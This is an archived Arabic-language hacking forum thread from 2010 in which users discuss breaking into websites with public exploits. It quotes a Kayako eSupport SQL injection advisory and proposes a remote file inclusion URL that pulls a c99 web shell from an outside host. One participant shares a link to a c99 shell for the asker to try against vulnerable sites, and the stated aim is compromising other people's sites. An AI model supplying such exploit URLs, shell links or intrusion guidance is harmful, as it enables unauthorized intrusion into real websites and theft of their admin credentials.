المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : اصعب مرحله البحث عن ثغره للخبرا الدخول



back-connect
07-20-2010, 08:05 PM
السلام عليكم

اخواني انا عندي سؤال وا استفسار بسيط للخبراا

1- هل ختراق المواقع له طرق غير الثغرات وخطآ البرمجه؟



استفسار :)

عندما احصل على ثغره من مواقع الثغرات مثل http://www.exploit-db.com

وازبط الثغره مع الشل
وابحث عن المواقع المصابه بثغره اجد مواقع مصابه بس اذا جيت اركب رابط الشل لا يطلع لي شي:mad:

ممكن حل لا اهل المجال هذا

BLACK.JaGuAr
07-21-2010, 01:49 AM
اضربي مثال عشان نقدر نوضح

back-connect
07-21-2010, 03:24 AM
مثلن زي هذي الثغره لي في هذا الرابط http://www.exploit-db.com/exploits/14404/


او

Peace !!
################################################## #########################
Name : Kayako eSupport v3.70.02 SQL Injection Vulnerability
Date : july 18,2010
Vendor urL : http://www.kayako.com/solutions/esupport/
Dork :Find It !!
Author : ScOrPiOn
Greetz : Dr.Dmar & Joker_1 & HiDDen HaCkEr & GeNeRaL KbKb & And All My Friends
################################################## #########################
Effect :
/includes/functions.php
################################################## #########################
Here The SQL Injec .....
http://server/Kayako/index.php?_m=downloads&_a=*SQLi*
################################################## #########################

Peace !!

الربط الصحيح مع الشل او الاستثمار هل هواا كذا
/Kayako/index.php?_m=downloads&_a=http://h1.ripway.com/aser/c99.txt?
صح ام خطاء

تكفى بلاك جوكر ولله جننتني هذي

BLACK.JaGuAr
07-21-2010, 02:44 PM
هذي ياخيتو ثغرة حقن انجكشن عملها انها تخرجلك اليوزر والباس تبع الادمن لاكن مشفرين
يعني مافي منها فايددة الا اذا عندك وقت كبير لفك التشفير ، ثغرات رفع الشيل تسمى الفايل انكلود

back-connect
07-21-2010, 03:40 PM
قسم بالله اني غبيه لي اسبوع ماسكه على هذي الثغره
طيب كيف احصل على ثغره الفايل انكلود
ادري اني تعبتك معي بس والله معندي احد اسئله استحمني شوي

millen!um
07-31-2010, 05:22 PM
أختي ربما لم تضعي نقطة إستفهام آخر الرابط
أو الموقع مرقع الثغرة
أو الشل غير سليم جربي هذا من رفعي الخاص و حديث
http://h1.ripway.com/mooha/c99.php.txt

ربما الأخ بلاك يفسرلنا

back-connect
08-01-2010, 04:07 AM
الف شكر على الشل
وجاري التجربه